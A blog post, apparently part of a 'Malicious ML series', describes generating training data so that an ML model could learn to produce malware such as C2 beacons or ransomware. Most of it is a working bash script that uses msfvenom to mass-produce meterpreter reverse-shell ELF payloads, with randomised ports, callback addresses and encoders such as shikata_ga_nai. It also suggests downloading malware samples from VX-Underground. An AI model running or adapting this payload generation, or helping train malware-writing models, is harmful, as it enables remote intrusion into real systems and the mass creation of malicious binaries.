Skip to main content

Command Palette

Search for a command to run...

Malicious ML series - generate ELF training data

Updated
2 min read
Malicious ML series - generate ELF training data
C

I hold a PhD in Computer Science and have been published in a variety of international peer-reviewed journals.

AI is going to be a problem. I don't know what will cause the first "big issue"; it might be from a courtroom where a defendant is sent to jail based off erroneous AI-generated data, it could be a death in a medical setting.. but, something is going to happen.

Let's take the existing adversarial AI research (there's been plenty) and make it useful.

I'm here to bring you up to speed.

Purpose

If we want to train an ML algorithm to produce something malicious - say, a C2 beacon or a ransomware binary, we need good training data.

Approach

Use MSFVenom to generate a few thousand samples we can then feed into an ML algorithm.

Drawbacks

Due to bypassing compilers and linking steps, this at best will generate working binaries for a single architecture. Even if it generates a valid binary, it's not going to produce magical AV/EDR evading binaries compatible with multiple platforms and customizable C2 domains. However, it's still a fun experiment.

Alternatives to generation

There are lots of malicious binary examples out there.

VX-Underground

Download binaries directly from [[VX-Underground]] or a standard academic dataset. This introduces a lot of variety in PE/ELF format.

Code

Prereq - msfvenom installed

#!/bin/bash

overall_start_time=$(date +%s)
numFiles=10000
echo "Generating files.."
for i in $(seq 1 $numFiles); do

    LHOSTO=$((1 + $RANDOM % 100))
    LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
    LPORTIDX=$(( $RANDOM % ${#LPORTCHOICES[@]} ))
    LPORTR=${LPORTCHOICES[$LPORTIDX]}
    FILENAME=$(uuidgen).elf
    PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
    PAYLOADIDX=$(( $RANDOM % ${#PAYLOADTYPES[@]} ))
    PAYLOAD=${PAYLOADTYPES[$PAYLOADIDX]}
    ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")
    ENCODERIDX=$((RANDOM % ${#ENCODERS[@]}))
    ENCODERR=${ENCODERS[$ENCODERIDX]}

    # Generate based on payload type
    start_time=$(date +%s)
    msfvenom -p $PAYLOAD LHOST=192.168.0.$LHOSTO LPORT=$LPORTR -e $ENCODERR -f elf -o out/$FILENAME 2> /dev/null
    end_time=$(date +%s)

    duration=$((end_time - start_time))
    # echo "Generated $FILENAME : $PAYLOAD : 192.168.0.$LHOSTO : $LPORTR in $duration seconds"
    echo -e "$FILENAME\t$PAYLOAD\t192.168.0.$LHOSTO\t$LPORTR\t$ENCODERR" >> labels.tsv

    percent=$((i * 100 / numFiles))
    printf "\rProgress: [%-50s] %d%%" $(printf "%-${percent}s" | tr ' ' '#') $percent
    echo -ne

done
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time)) 
echo "Done in $duration seconds."

Explanation

Generate a bunch of meterpreter shells for use in ML algos.

Since the diffs in these files will simply be the encoded (or encrypted) payload, which will be high-entropy, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.

Entropy Analysis

Similarity of generated ELF binaries

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, these binaries show a fairly random distribution of differences; however, note the scale of differences is not extreme.

Still, it's a fun experiment.

Malicious ML series - generate ELF training data